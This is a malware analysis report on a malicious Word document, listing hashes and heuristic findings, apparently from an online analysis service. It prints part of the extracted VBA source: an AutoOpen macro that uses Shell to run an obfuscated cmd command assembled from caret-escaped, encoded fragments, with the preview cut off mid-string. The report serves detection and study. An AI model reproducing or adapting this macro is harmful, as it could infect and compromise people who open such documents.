Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c0ebd31696f006ff…

MALICIOUS

Office (OLE)

91.0 KB Created: 2018-08-31 18:35:00 Authoring application: Microsoft Office Word First seen: 2019-02-10
MD5: 22af18efe4cce65076659d9e9c8b24ca SHA-1: facc7682b8c97aede3c5cdb0c32ee54e88cce82e SHA-256: c0ebd31696f006ffd7c60fe9bd757e80a453b78635b2cd0c5ed7eefb29f07b41
142 Risk Score

Heuristics 5

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9919 bytes
SHA-256: 07bf9ab14366eae49c599c8db440990a170ea892c2ba4e7e301934271201f2e3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wkmwdMaorjp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()

On _
Error _
Resume _
Next
   Hour 58522 / sWcFj * 83045 / bcinU
   Hour 98578 / 86103
Shell KeyString(1 + 10 + 11 + 5 + 40) + twcVIDGlnQ + SmTWqoOHFnjR + iwrwsfYBzl + SYUmbsQiL + NBXuwc + LXvURvBBVC + NZDHBi + idSnmZnRvCQz + mlopMGD, 81 - 81
   Hour 18580 * wjrTR / PLFaV / SAivwA
   Hour FuvfJS * 78395 * QJCzs / FOdzz
   Hour 32208 * rSNVU * rFJitT * qFiUz
End Sub



Attribute VB_Name = "GvvbJIJYNc"
Function iwrwsfYBzl()

On _
Error _
Resume _
Next
Hour jUPRd * mEMMLb * 5992 / 87621
   Hour tBWWP / UOqNj
   Hour zZqYj / 70895 / 88421 / luARs
GzmKqp = "md /" + "V:^ON/" + "C" + Chr(5 + 1 + 0 + 0 + 28) + "^se^t" + " " + "^13=A^A" + "C^A" + "gA" + "^" + "AI" + "A^AC^" + "A^" + "gAA^" + "IA^ACAg"
Hour YIKDc / qztZv * 51238 / fidUL
   Hour HwboMp / 61372
   Hour RZjXf / fKAKzZ * 96008 / NmpOPd
tifAM = "^A^A^" + "I^A^ACA" + "g^A^" + "AI^A" + "^AC^A" + "g^AAI" + "^A^AC" + "^A^gAQf"
Hour 91236 / XFMzX
   Hour 41178 / 70826 / zwbnYj / jwiZWc
   Hour oRioEw * KCpiB
   Hour wnGvz / XSkwqj
   Hour mZnJZ / rqizmB
tztWdCcv = "^A0^" + "HA" + "7B^A" + "^" + "aAM^G" + "A^0BQY" + "^A^" + "M^G" + "^A9Bw" + "^O^A^s" + "G^AhBQZ"
Hour hYSCll / Mvzbt / rilSv * fEAvW
   Hour 37200 * HlPlk
lkRQkwbVD = "A" + "^I^" + "HA^i^B" + "^" + "wO^AQF^" + "A^p" + "B^gR" + "^AQC" + "^Ag" + "^A^Q^" + "b^A" + "UG^A" + "^0^BQ^S"
Hour 44798 / fUznWM
   Hour qljTp * zzcIr
   Hour wnizE / TFulp / 63841 * vUSZIb
TBswRNfMPzI = "^A^0C" + "^Al^" + "Bwa" + "A" + "8^" + "G" + "^A^2Bg^" + "bAkEA7"
Hour voMDa * 91744 * pVmqLj * fNNlL
   Hour 13931 * vfOFV
ndvKO = "AQK" + "^AQ" + "F" + "^ApBg" + "R^A" + "^QC^A^g" + "^AA" + "L^Ao" + "^G^A^P"
Hour 55940 * YsXYdN
vVcOuBkPu = "B^gQA^" + "QCA^" + "o^AQZA" + "^w" + "^G^A" + "^p^B^" + "gR^A^Q" + "GA^h^Bw" + "^bA^w" + "^" + "GA" + "uB"
Hour hAPwdi / zSOuG
   Hour 33810 * mwBji / qEirc / 14145
   Hour QttjpV * WXsoR * 36985 / bBAJk
aUlEK = "^w" + "dA" + "8" + "G^A^E" + "^Bg^L" + "^A^g"
iwrwsfYBzl = GzmKqp + tifAM + tztWdCcv + lkRQkwbVD + TBswRNfMPzI + ndvKO + vVcOuBkPu + aUlEK
   Hour JtJiL / LXzFY * vrQFM * rEpjOw
   Hour hPfKKd * IMLKV
   Hour SuFQG / PqpYXD / 48812 / wWGnwY
   Hour lVVTK / uiFmB / 62666 * KwpLF
End Function
Function SYUmbsQiL()

On _
Error _
Resume _
Next
Hour 31792 / CDrwtN
   Hour aiYIY / QkLHcQ / fSZSi * vEGBb
   Hour XHwTh / JThwur / CIjvFh * udwVd
   Hour lNcfLW * zkobwA * iGEzj * 33279
   Hour jroCo / HiBJl / wXBdjh * tIapiQ
wqjFXV = "^" + "F^A" + "uB^" + "Q" + "^W^A^" + "QCA7^BQ" + "eA" + "^IHA0^" + "B^weA^k"
Hour 56774 / wwbMn
   Hour NMLiz / IBGmd * dZDLJQ * azMFQ
   Hour RiRdW / TUOoz
bAECUzjSs = "CA^3BQ" + "^W^A" + "IHA^" + "kA^" + "A^"
Hour 78645 / VTbLn
   Hour 83501 / msPbpC
ajOJtjwQq = "I^A4^G^" + "A^pB^" + "AI^Ao^G" + "^APB^g" + "^Q^AQC" + "^Ao^AA" + "aA" + "^MG^Ah^" + "BQ^ZA" + "IH" + "^AvBg" + "^Z^A^s^"
Hour 20151 * 79821
   Hour isuPJE * oEEBH * 90484 * ZXBjmL
   Hour furMO / WiXqi
   Hour ChSYQ / jkuCN
wHKqO = "DAnA^" + "Q^ZAg" + "^" + "H" + "^" + "A" + "^l^BgL" + "^AcC" + "^A" + "r^" + "AAc"
Hour 70715 / wubdC
   Hour XjVSq * zloXF / JwtSL / dJUXHv
   Hour rojGLf / XihHEo / 63825 * bafQPO
PozUi = "^Ac^H" + "A^MBA^J" + "AsCAn^A" + "^" + "A^X^A" + "cC^Ar" + "^"
Hour 49169 / MVJEhM / 50558 / lULKH
ztFjtaW = "A^wY" + "^" + "AkGAs" + "B" + "^g" + "Y^AU" + "HA^" + "wB" + "^gOAY^H"
Hour twciO * zDHHQ
dmFCnoLCENp = "Au^B^QZ" + "^A" + "QC" + "A9^A^A" + "VA" + "^k^"
Hour dJhPc / kWtTq
   Hour 55230 * ZOqpf / JDwua / VGwZvW
IsRmiubVK = "G^A^G" + "^B" + "AJA^" + "s^D^A" + "nAQ^OAc" + "DAn^A" + "^AI^" + "A0^DA" + "^g^AAc^" + "Ac^H^A^" + "M^B^AJ" + "A^s"
Hour qMjXl / Mvinzo / FJsbD / UzwFQ
   Hour Cdrdkf * DIoUn * 55818 / tQbYFL
   Hour 80618 / wuAvk
   Hour 38429 / bwHHRP
   Hour 25427 * pjqiaT
jGIXlzVSkvB = "DA" 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.